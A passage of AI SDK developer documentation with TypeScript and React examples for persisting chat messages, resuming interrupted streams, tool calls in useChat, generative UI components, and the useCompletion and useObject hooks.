<input value={input} onChange={handleInputChange} />
</form>
</div>
);
}
Storing messages
useChat sends the chat id and the messages to the backend.
We have enabled the sendExtraMessageFields option to send the id and createdAt fields,
meaning that we store messages in the useChat message format.
Storing messages is done in the onFinish callback of the streamText function.
onFinish receives the messages from the AI response as a CoreMessage[],
and we use the appendResponseMessages
helper to append the AI response messages to the chat messages.
import { openai } from '@ai-sdk/openai';
import { appendResponseMessages, streamText } from 'ai';
import { saveChat } from '@tools/chat-store';
export async function POST(req: Request) {
const { messages, id } = await req.json();
const result = streamText({
model: openai('gpt-4o-mini'),
messages,
async onFinish({ response }) {
await saveChat({
id,
messages: appendResponseMessages({
messages,
responseMessages: response.messages,
}),
});
},
});
return result.toDataStreamResponse();
}
The actual storage of the messages is done in the saveChat function, which in
our file-based chat store is implemented as follows:
import { Message } from 'ai';
import { writeFile } from 'fs/promises';
export async function saveChat({
id,
messages,
}: {
id: string;
messages: Message[];
}): Promise<void> {
const content = JSON.stringify(messages, null, 2);
await writeFile(getChatFile(id), content);
}
// ... rest of the file
Message IDs
In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.
The IDs for user messages are generated by the useChat hook on the client,
and the IDs for AI response messages are generated by streamText.
You can control the ID format by providing ID generators (see createIdGenerator()):
import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';
const {
// ...
} = useChat({
// ...
// id format for client-side messages:
generateId: createIdGenerator({
prefix: 'msgc',
size: 16,
}),
});
import { createIdGenerator, streamText } from 'ai';
export async function POST(req: Request) {
// ...
const result = streamText({
// ...
// id format for server-side messages:
experimental_generateMessageId: createIdGenerator({
prefix: 'msgs',
size: 16,
}),
});
// ...
}
Sending only the last message
Once you have implemented message persistence, you might want to send only the last message to the server. This reduces the amount of data sent to the server on each request and can improve performance.
To achieve this, you can provide an experimental_prepareRequestBody function to the useChat hook (React only).
This function receives the messages and the chat ID, and returns the request body to be sent to the server.
import { useChat } from '@ai-sdk/react';
const {
// ...
} = useChat({
// ...
// only send the last message to the server:
experimental_prepareRequestBody({ messages, id }) {
return { message: messages[messages.length - 1], id };
},
});
On the server, you can then load the previous messages and append the new message to the previous messages:
import { appendClientMessage, streamText } from 'ai';
import { loadChat } from '@tools/chat-store';
export async function POST(req: Request) {
// get the last message from the client:
const { message, id } = await req.json();
// load the previous messages from the server:
const previousMessages = await loadChat(id);
// append the new message to the previous messages:
const messages = appendClientMessage({
messages: previousMessages,
message,
});
const result = streamText({
// ...
messages,
});
// ...
}
Handling client disconnects
By default, the AI SDK streamText function applies backpressure to the language model provider to prevent the consumption of tokens that have not yet been requested.
However, this means that when the client disconnects, e.g. by closing the browser tab or because of a network issue, the stream from the LLM will be aborted and the conversation may end up in a broken state.
Assuming that you have a storage solution in place, you can use the consumeStream method to consume the stream on the backend,
and then save the result as usual.
consumeStream effectively removes the backpressure,
meaning that the result is stored even when the client has already disconnected.
import { openai } from '@ai-sdk/openai';
import { appendResponseMessages, streamText } from 'ai';
import { saveChat } from '@tools/chat-store';
export async function POST(req: Request) {
const { messages, id } = await req.json();
const result = streamText({
model: openai('gpt-4o-mini'),
messages,
async onFinish({ response }) {
await saveChat({
id,
messages: appendResponseMessages({
messages,
responseMessages: response.messages,
}),
});
},
});
// consume the stream to ensure it runs to completion & triggers onFinish
// even when the client response is aborted:
result.consumeStream(); // no await
return result.toDataStreamResponse();
}
When the client reloads the page after a disconnect, the chat will be restored from the storage solution.
Resuming ongoing streams
This feature is experimental and may change in future versions.
The useChat hook has experimental support for resuming an ongoing chat generation stream by any client, either after a network disconnect or by reloading the chat page. This can be useful for building applications that involve long-running conversations or for ensuring that messages are not lost in case of network failures.
The following are the prerequisites for your chat application to support resumable streams:
- Installing the resumable-stream package, which helps create and manage the publisher/subscriber mechanism of the streams.
- Creating a Redis instance to store the stream state.
- Creating a table that tracks the stream IDs associated with a chat (a minimal sketch of such storage helpers follows below).
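The route handlers later in this section import two storage helpers, loadStreams and appendStreamId, from @/util/chat-store. These are your own code, not AI SDK exports. A minimal file-based sketch, matching the chat store from earlier (in production, a database table is the better fit):
import { existsSync } from 'fs';
import { readFile, writeFile } from 'fs/promises';
import path from 'path';
function getStreamsFile(chatId: string): string {
return path.join(process.cwd(), '.chats', `${chatId}.streams.json`);
}
// load all stream IDs that were recorded for a chat:
export async function loadStreams(chatId: string): Promise<string[]> {
const file = getStreamsFile(chatId);
if (!existsSync(file)) return [];
return JSON.parse(await readFile(file, 'utf8'));
}
// record a new stream ID for a chat:
export async function appendStreamId({
chatId,
streamId,
}: {
chatId: string;
streamId: string;
}): Promise<void> {
const streamIds = await loadStreams(chatId);
await writeFile(getStreamsFile(chatId), JSON.stringify([...streamIds, streamId]));
}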
To resume a chat stream, you will use the experimental_resume function returned by the useChat hook. You will call this function during the initial mount of the hook inside the main chat component.
'use client';
import { useEffect } from 'react';
import { useChat } from '@ai-sdk/react';
import { Input } from '@/components/input';
import { Messages } from '@/components/messages';
export function Chat({ id }: { id: string }) {
const { experimental_resume } = useChat({ id });
useEffect(() => {
experimental_resume();
// we use an empty dependency array to
// ensure this effect runs only once
}, []);
return (
<div>
<Messages />
<Input />
</div>
);
}
For a more resilient implementation that handles race conditions that can occur in-flight during a resume request, you can use the following useAutoResume hook. This will automatically process the append-message SSE data part streamed by the server.
'use client';
import { useEffect } from 'react';
import type { UIMessage } from 'ai';
import type { UseChatHelpers } from '@ai-sdk/react';
export type DataPart = { type: 'append-message'; message: string };
export interface Props {
autoResume: boolean;
initialMessages: UIMessage[];
experimental_resume: UseChatHelpers['experimental_resume'];
data: UseChatHelpers['data'];
setMessages: UseChatHelpers['setMessages'];
}
export function useAutoResume({
autoResume,
initialMessages,
experimental_resume,
data,
setMessages,
}: Props) {
useEffect(() => {
if (!autoResume) return;
const mostRecentMessage = initialMessages.at(-1);
if (mostRecentMessage?.role === 'user') {
experimental_resume();
}
// we intentionally run this once
// eslint-disable-next-line react-hooks/exhaustive-deps
}, []);
useEffect(() => {
if (!data || data.length === 0) return;
const dataPart = data[0] as DataPart;
if (dataPart.type === 'append-message') {
const message = JSON.parse(dataPart.message) as UIMessage;
setMessages([...initialMessages, message]);
}
}, [data, initialMessages, setMessages]);
}
You can then use this hook in your chat component as follows.
'use client';
import { useChat } from '@ai-sdk/react';
import { Input } from '@/components/input';
import { Messages } from '@/components/messages';
import { useAutoResume } from '@/hooks/use-auto-resume';
export function Chat({ id }: { id: string }) {
const { experimental_resume, data, setMessages } = useChat({ id });
useAutoResume({
autoResume: true,
initialMessages: [],
experimental_resume,
data,
setMessages,
});
return (
<div>
<Messages />
<Input />
</div>
);
}
The experimental_resume function makes a GET request to your configured chat endpoint (or /api/chat by default) whenever your client calls it. If there's an active stream, it will pick up where it left off; otherwise it simply finishes without error.
The GET request automatically appends the chatId query parameter to the URL to help identify the chat the request belongs to. Using the chatId, you can look up the most recent stream ID from the database and resume the stream.
GET /api/chat?chatId=<your-chat-id>
You will already have implemented the POST handler for the /api/chat route to create new chat generations. When using experimental_resume, you must also implement a GET handler for the /api/chat route to resume streams.
1. Implement the GET handler
Add a GET method to /api/chat that:
- Reads chatId from the query string
- Validates it's present
- Loads any stored stream IDs for that chat
- Returns the latest one to streamContext.resumableStream()
- Falls back to an empty stream if it's already closed
import { loadStreams, getMessagesByChatId } from '@/util/chat-store'; // your own storage helpers
import { createDataStream } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
const streamContext = createResumableStreamContext({
waitUntil: after,
});
export async function GET(request: Request) {
const { searchParams } = new URL(request.url);
const chatId = searchParams.get('chatId');
if (!chatId) {
return new Response('id is required', { status: 400 });
}
const streamIds = await loadStreams(chatId);
if (!streamIds.length) {
return new Response('No streams found', { status: 404 });
}
const recentStreamId = streamIds.at(-1);
if (!recentStreamId) {
return new Response('No recent stream found', { status: 404 });
}
const emptyDataStream = createDataStream({
execute: () => {},
});
const stream = await streamContext.resumableStream(
recentStreamId,
() => emptyDataStream,
);
if (stream) {
return new Response(stream, { status: 200 });
}
/*
* For when the generation is "active" during SSR but the
* resumable stream has concluded after reaching this point.
*/
const messages = await getMessagesByChatId({ id: chatId });
const mostRecentMessage = messages.at(-1);
if (!mostRecentMessage || mostRecentMessage.role !== 'assistant') {
return new Response(emptyDataStream, { status: 200 });
}
const streamWithMessage = createDataStream({
execute: buffer => {
buffer.writeData({
type: 'append-message',
message: JSON.stringify(mostRecentMessage),
});
},
});
return new Response(streamWithMessage, { status: 200 });
}
After you've implemented the GET handler, you can update the POST handler to handle the creation of resumable streams.
2. Update the POST handler
When you create a brand-new chat completion, you must:
- Generate a fresh streamId
- Persist it alongside your chatId
- Kick off a createDataStream that pipes tokens as they arrive
- Hand that new stream to streamContext.resumableStream()
import {
appendResponseMessages,
createDataStream,
generateId,
streamText,
} from 'ai';
import { appendStreamId, saveChat } from '@/util/chat-store';
import { openai } from '@ai-sdk/openai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
const streamContext = createResumableStreamContext({
waitUntil: after,
});
export async function POST(request: Request) {
const { id, messages } = await request.json();
const streamId = generateId();
// Record this new stream so we can resume later
await appendStreamId({ chatId: id, streamId });
// Build the data stream that will emit tokens
const stream = createDataStream({
execute: dataStream => {
const result = streamText({
model: openai('gpt-4o'),
messages,
onFinish: async ({ response }) => {
await saveChat({
id,
messages: appendResponseMessages({
messages,
responseMessages: response.messages,
}),
});
},
});
// Return a resumable stream to the client
result.mergeIntoDataStream(dataStream);
},
});
return new Response(
await streamContext.resumableStream(streamId, () => stream),
);
}
With both handlers, your clients can now gracefully resume ongoing streams.
title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.
Chatbot Tool Usage
With useChat and streamText, you can use tools in your chatbot application.
The AI SDK supports three types of tools in this context:
- Automatically executed server-side tools
- Automatically executed client-side tools
- Tools that require user interaction, such as confirmation dialogs
The flow is as follows:
- The user enters a message in the chat UI.
- The message is sent to the API route.
- In your server-side route, the language model generates tool calls during the streamText call.
- All tool calls are forwarded to the client.
- Server-side tools are executed using their execute method and their results are forwarded to the client.
- Client-side tools that should be automatically executed are handled with the onToolCall callback. You can return the tool result from the callback.
- Client-side tools that require user interaction can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
- When the user interaction is done, addToolResult can be used to add the tool result to the chat.
- When there are tool calls in the last assistant message and all tool results are available, the client sends the updated messages back to the server. This triggers another iteration of this flow.
The tool call and tool executions are integrated into the assistant message as tool invocation parts. A tool invocation is at first a tool call, and then it becomes a tool result when the tool is executed. The tool result contains all information about the tool call as well as the result of the tool execution.
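Conceptually, a tool invocation part on an assistant message has roughly the following shape (a simplified sketch for orientation, not the exact library types):
// simplified sketch of a tool invocation part:
type ToolInvocationPart = {
type: 'tool-invocation';
toolInvocation:
| { state: 'partial-call'; toolCallId: string; toolName: string; args: any }
| { state: 'call'; toolCallId: string; toolName: string; args: any }
| { state: 'result'; toolCallId: string; toolName: string; args: any; result: any };
};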
Example
In this example, we'll use three tools:
- getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
- askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
- getLocation: An automatically executed client-side tool that returns a random city.
API route
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
tools: {
// server-side tool with execute function:
getWeatherInformation: {
description: 'show the weather in a given city to the user',
parameters: z.object({ city: z.string() }),
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
// client-side tool that starts user interaction:
askForConfirmation: {
description: 'Ask the user for confirmation.',
parameters: z.object({
message: z.string().describe('The message to ask for confirmation.'),
}),
},
// client-side tool that is automatically executed on the client:
getLocation: {
description:
'Get the user location. Always ask for confirmation before using this tool.',
parameters: z.object({}),
},
},
});
return result.toDataStreamResponse();
}
Client-side page
The client-side page uses the useChat hook to create a chatbot application with real-time message streaming.
Tool invocations are displayed in the chat UI as tool invocation parts.
Please make sure to render the messages using the parts property of the message.
There are three things worth mentioning:
- The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city.
- The toolInvocations property of the last assistant message contains all tool calls and results. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolResult.
- The maxSteps option is set to 5. This enables several tool use iterations between the client and the server.
'use client';
import { ToolInvocation } from 'ai';
import { useChat } from '@ai-sdk/react';
export default function Chat() {
const { messages, input, handleInputChange, handleSubmit, addToolResult } =
useChat({
maxSteps: 5,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
if (toolCall.toolName === 'getLocation') {
const cities = [
'New York',
'Los Angeles',
'Chicago',
'San Francisco',
];
return cities[Math.floor(Math.random() * cities.length)];
}
},
});
return (
<>
{messages?.map(message => (
<div key={message.id}>
<strong>{`${message.role}: `}</strong>
{message.parts.map(part => {
switch (part.type) {
// render text parts as simple text:
case 'text':
return part.text;
// for tool invocations, distinguish between the tools and the state:
case 'tool-invocation': {
const callId = part.toolInvocation.toolCallId;
switch (part.toolInvocation.toolName) {
case 'askForConfirmation': {
switch (part.toolInvocation.state) {
case 'call':
return (
<div key={callId}>
{part.toolInvocation.args.message}
<div>
<button
onClick={() =>
addToolResult({
toolCallId: callId,
result: 'Yes, confirmed.',
})
}
>
Yes
</button>
<button
onClick={() =>
addToolResult({
toolCallId: callId,
result: 'No, denied',
})
}
>
No
</button>
</div>
</div>
);
case 'result':
return (
<div key={callId}>
Location access allowed:{' '}
{part.toolInvocation.result}
</div>
);
}
break;
}
case 'getLocation': {
switch (part.toolInvocation.state) {
case 'call':
return <div key={callId}>Getting location...</div>;
case 'result':
return (
<div key={callId}>
Location: {part.toolInvocation.result}
</div>
);
}
break;
}
case 'getWeatherInformation': {
switch (part.toolInvocation.state) {
// example of pre-rendering streaming tool calls:
case 'partial-call':
return (
<pre key={callId}>
{JSON.stringify(part.toolInvocation, null, 2)}
</pre>
);
case 'call':
return (
<div key={callId}>
Getting weather information for{' '}
{part.toolInvocation.args.city}...
</div>
);
case 'result':
return (
<div key={callId}>
Weather in {part.toolInvocation.args.city}:{' '}
{part.toolInvocation.result}
</div>
);
}
break;
}
}
}
}
})}
<br />
</div>
))}
<form onSubmit={handleSubmit}>
<input value={input} onChange={handleInputChange} />
</form>
</>
);
}
Tool call streaming
You can stream tool calls while they are being generated by enabling the
toolCallStreaming option in streamText.
export async function POST(req: Request) {
// ...
const result = streamText({
toolCallStreaming: true,
// ...
});
return result.toDataStreamResponse();
}
When the flag is enabled, partial tool calls will be streamed as part of the data stream.
They are available through the useChat hook.
The tool invocation parts of assistant messages will also contain partial tool calls.
You can use the state property of the tool invocation to render the correct UI.
export default function Chat() {
// ...
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.parts.map(part => {
if (part.type === 'tool-invocation') {
switch (part.toolInvocation.state) {
case 'partial-call':
return <>render partial tool call</>;
case 'call':
return <>render full tool call</>;
case 'result':
return <>render tool result</>;
}
}
})}
</div>
))}
</>
);
}
Step start parts
When you are using multi-step tool calls, the AI SDK will add step start parts to the assistant messages.
If you want to display boundaries between tool invocations, you can use the step-start parts as follows:
// ...
// where you render the message parts:
message.parts.map((part, index) => {
switch (part.type) {
case 'step-start':
// show step boundaries as horizontal lines:
return index > 0 ? (
<div key={index} className="text-gray-500">
<hr className="my-2 border-gray-300" />
</div>
) : null;
case 'text':
// ...
case 'tool-invocation':
// ...
}
});
// ...
Server-side Multi-Step Calls
You can also use multi-step calls on the server-side with streamText.
This works when all invoked tools have an execute function on the server side.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { z } from 'zod';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: openai('gpt-4o'),
messages,
tools: {
getWeatherInformation: {
description: 'show the weather in a given city to the user',
parameters: z.object({ city: z.string() }),
// tool has execute function:
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
},
maxSteps: 5,
});
return result.toDataStreamResponse();
}
Errors
Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.
To surface the errors, you can use the getErrorMessage function when calling toDataStreamResponse.
export function errorHandler(error: unknown) {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
}
const result = streamText({
// ...
});
return result.toDataStreamResponse({
getErrorMessage: errorHandler,
});
In case you are using createDataStreamResponse, you can pass an onError function to customize the error message:
const response = createDataStreamResponse({
// ...
async execute(dataStream) {
// ...
},
onError: error => `Custom error: ${error instanceof Error ? error.message : String(error)}`,
});
title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.
Generative User Interfaces
Generative user interfaces (generative UI) allow a large language model (LLM) to go beyond text and "generate UI". This creates a more engaging and AI-native experience for users.
At the core of generative UI are tools, which are functions you provide to the model to perform specialized tasks like getting the weather in a location. The model can decide when and how to use these tools based on the context of the conversation.
Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:
- You provide the model with a prompt or conversation history, along with a set of tools.
- Based on the context, the model may decide to call a tool.
- If a tool is called, it will execute and return data.
- This data can then be passed to a React component for rendering.
By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.
Build a Generative UI Chat Interface
Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.
Basic Chat Implementation
Start with a basic chat implementation using the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>{message.content}</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={handleInputChange}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
To handle the chat requests and model responses, set up an API route:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
export async function POST(request: Request) {
const { messages } = await request.json();
const result = streamText({
model: openai('gpt-4o'),
system: 'You are a friendly assistant!',
messages,
maxSteps: 5,
});
return result.toDataStreamResponse();
}
This API route uses the streamText function to process chat messages and stream the model's responses back to the client.
Create a Tool
Before enhancing your chat interface with dynamic UI elements, you need to create a tool and corresponding React component. A tool will allow the model to perform a specific action, such as fetching weather information.
Create a new file called ai/tools.ts with the following content:
import { tool as createTool } from 'ai';
import { z } from 'zod';
export const weatherTool = createTool({
description: 'Display the weather for a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async function ({ location }) {
await new Promise(resolve => setTimeout(resolve, 2000));
return { weather: 'Sunny', temperature: 75, location };
},
});
export const tools = {
displayWeather: weatherTool,
};
In this file, you've created a tool called weatherTool. It simulates fetching weather information for a given location, returning mock data after a 2-second delay. In a real-world application, you would replace this simulation with an actual API call to a weather service, e.g. as sketched below.
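One possible real implementation of the execute function, using the free Open-Meteo API (the endpoint and response shapes here are assumptions based on that service; verify against its documentation before relying on them):
execute: async function ({ location }) {
// geocode the location name to coordinates (assumed response shape):
const geo = await fetch(
`https://geocoding-api.open-meteo.com/v1/search?name=${encodeURIComponent(location)}`,
).then(res => res.json());
const { latitude, longitude } = geo.results[0];
// fetch the current conditions for those coordinates:
const data = await fetch(
`https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current_weather=true`,
).then(res => res.json());
return {
// Open-Meteo returns a numeric weathercode; map it to a human-readable label as needed:
weather: `weather code ${data.current_weather.weathercode}`,
temperature: data.current_weather.temperature,
location,
};
},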
Update the API Route
Update the API route to include the tool you've defined:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { tools } from '@/ai/tools';
export async function POST(request: Request) {
const { messages } = await request.json();
const result = streamText({
model: openai('gpt-4o'),
system: 'You are a friendly assistant!',
messages,
maxSteps: 5,
tools,
});
return result.toDataStreamResponse();
}
Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.
Create UI Components
Create a new file called components/weather.tsx:
type WeatherProps = {
temperature: number;
weather: string;
location: string;
};
export const Weather = ({ temperature, weather, location }: WeatherProps) => {
return (
<div>
<h2>Current Weather for {location}</h2>
<p>Condition: {weather}</p>
<p>Temperature: {temperature}°F</p>
</div>
);
};
This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).
Render the Weather Component
Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.
To check if the model has called a tool, you can use the toolInvocations property of the message object. This property contains information about any tools that were invoked in that generation, including the toolCallId, toolName, args, state, and result.
Update your page.tsx file:
'use client';
import { useChat } from '@ai-sdk/react';
import { Weather } from '@/components/weather';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit } = useChat();
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>{message.content}</div>
<div>
{message.toolInvocations?.map(toolInvocation => {
const { toolName, toolCallId, state } = toolInvocation;
if (state === 'result') {
if (toolName === 'displayWeather') {
const { result } = toolInvocation;
return (
<div key={toolCallId}>
<Weather {...result} />
</div>
);
}
} else {
return (
<div key={toolCallId}>
{toolName === 'displayWeather' ? (
<div>Loading weather...</div>
) : null}
</div>
);
}
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={handleInputChange}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
In this updated code snippet, you:
- Check if the message has toolInvocations.
- Check if the tool invocation state is 'result'.
- If it's a result and the tool name is 'displayWeather', render the Weather component.
- If the tool invocation state is not 'result', show a loading message.
This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.
Expanding Your Generative UI Application
You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:
Adding More Tools
To add more tools, simply define them in your ai/tools.ts file:
// Add a new stock tool
export const stockTool = createTool({
description: 'Get price for a stock',
parameters: z.object({
symbol: z.string().describe('The stock symbol to get the price for'),
}),
execute: async function ({ symbol }) {
// Simulated API call
await new Promise(resolve => setTimeout(resolve, 2000));
return { symbol, price: 100 };
},
});
// Update the tools object
export const tools = {
displayWeather: weatherTool,
getStockPrice: stockTool,
};
Now, create a new file called components/stock.tsx:
type StockProps = {
price: number;
symbol: string;
};
export const Stock = ({ price, symbol }: StockProps) => {
return (
<div>
<h2>Stock Information</h2>
<p>Symbol: {symbol}</p>
<p>Price: ${price}</p>
</div>
);
};
Finally, update your page.tsx file to include the new Stock component:
'use client';
import { useChat } from '@ai-sdk/react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';
export default function Page() {
const { messages, input, setInput, handleSubmit } = useChat();
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role}</div>
<div>{message.content}</div>
<div>
{message.toolInvocations?.map(toolInvocation => {
const { toolName, toolCallId, state } = toolInvocation;
if (state === 'result') {
if (toolName === 'displayWeather') {
const { result } = toolInvocation;
return (
<div key={toolCallId}>
<Weather {...result} />
</div>
);
} else if (toolName === 'getStockPrice') {
const { result } = toolInvocation;
return <Stock key={toolCallId} {...result} />;
}
} else {
return (
<div key={toolCallId}>
{toolName === 'displayWeather' ? (
<div>Loading weather...</div>
) : toolName === 'getStockPrice' ? (
<div>Loading stock price...</div>
) : (
<div>Loading...</div>
)}
</div>
);
}
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
type="text"
value={input}
onChange={event => {
setInput(event.target.value);
}}
/>
<button type="submit">Send</button>
</form>
</div>
);
}
By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.
title: Completion description: Learn how to use the useCompletion hook.
Completion
The useCompletion hook allows you to create a user interface to handle text completions in your application. It enables the streaming of text completions from your AI provider, manages the state for chat input, and updates the UI automatically as new messages are received.
In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.
Example
'use client';
import { useCompletion } from '@ai-sdk/react';
export default function Page() {
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/completion',
});
return (
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={handleInputChange}
id="input"
/>
<button type="submit">Submit</button>
<div>{completion}</div>
</form>
);
}
import { streamText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { prompt }: { prompt: string } = await req.json();
const result = streamText({
model: openai('gpt-3.5-turbo'),
prompt,
});
return result.toDataStreamResponse();
}
In the Page component, the useCompletion hook will send a request to your AI provider endpoint whenever the user submits a message. The completion is then streamed back in real-time and displayed in the UI.
This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.
Loading and error states
To show a loading spinner while the chatbot is processing the user's message, you can use the isLoading state returned by the useCompletion hook:
const { isLoading, ... } = useCompletion()
return(
<>
{isLoading ? <Spinner /> : null}
</>
)
Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:
const { error, ... } = useCompletion()
useEffect(() => {
if (error) {
toast.error(error.message)
}
}, [error])
// Or display the error message in the UI:
return (
<>
{error ? <div>{error.message}</div> : null}
</>
)
Controlled input
In the initial example, we have handleSubmit and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also use uncontrolled APIs for more advanced scenarios such as form validation or customized components.
The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:
const { input, setInput } = useCompletion();
return (
<>
<MyCustomInput value={input} onChange={value => setInput(value)} />
</>
);
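For example, you can pair setInput with the complete helper returned by useCompletion to build a fully custom form (a minimal sketch):
'use client';
import { useCompletion } from '@ai-sdk/react';
export default function CustomCompletion() {
const { input, setInput, complete, completion } = useCompletion();
return (
<div>
<input value={input} onChange={e => setInput(e.target.value)} />
{/* trigger the completion manually with the current input: */}
<button onClick={() => complete(input)}>Generate</button>
<div>{completion}</div>
</div>
);
}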
Cancelation
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.
const { stop, isLoading, ... } = useCompletion()
return (
<>
<button onClick={stop} disabled={!isLoading}>Stop</button>
</>
)
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.
Throttling UI Updates
This feature is currently only available for React.
By default, the useCompletion hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { completion, ... } = useCompletion({
// Throttle the completion and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useCompletion also provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle. These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
const { ... } = useCompletion({
onResponse: (response: Response) => {
console.log('Received response from server:', response)
},
onFinish: (prompt: string, completion: string) => {
console.log('Finished streaming completion:', completion)
},
onError: (error: Error) => {
console.error('An error occurred:', error)
},
})
It's worth noting that you can abort the processing by throwing an error in the onResponse callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.
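For example (a minimal sketch; the header check is hypothetical and stands in for whatever condition your backend signals):
const { completion } = useCompletion({
onResponse: (response: Response) => {
// hypothetical check: reject responses flagged by your own backend
if (response.headers.get('x-ratelimit-remaining') === '0') {
throw new Error('Rate limit reached, please retry later.')
}
},
onError: (error: Error) => {
console.error('An error occurred:', error)
},
})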
Configure Request Options
By default, the useCompletion hook sends an HTTP POST request to the /api/completion endpoint with the prompt as part of the request body. You can customize the request by passing additional options to the useCompletion hook:
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/custom-completion',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
});
In this example, the useCompletion hook sends a POST request to the /api/custom-completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On your server side, you can handle the request with this additional information.
title: Object Generation description: Learn how to use the useObject hook.
Object Generation
useObject is an experimental feature and only available in React.
The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.
In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.
Example
The example shows a small notifications demo app that generates fake notifications in real-time.
Schema
It is helpful to set up the schema in a separate file that is imported on both the client and server.
import { z } from 'zod';
// define a schema for the notifications
export const notificationSchema = z.object({
notifications: z.array(
z.object({
name: z.string().describe('Name of a fictional person.'),
message: z.string().describe('Message. Do not use emojis or links.'),
}),
),
});
Client
The client uses useObject to stream the object generation process.
The results are partial and are displayed as they are received.
Please note the code for handling undefined values in the JSX.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Server
On the server, we use streamObject to stream the object generation process.
import { openai } from '@ai-sdk/openai';
import { streamObject } from 'ai';
import { notificationSchema } from './schema';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const context = await req.json();
const result = streamObject({
model: openai('gpt-4-turbo'),
schema: notificationSchema,
prompt:
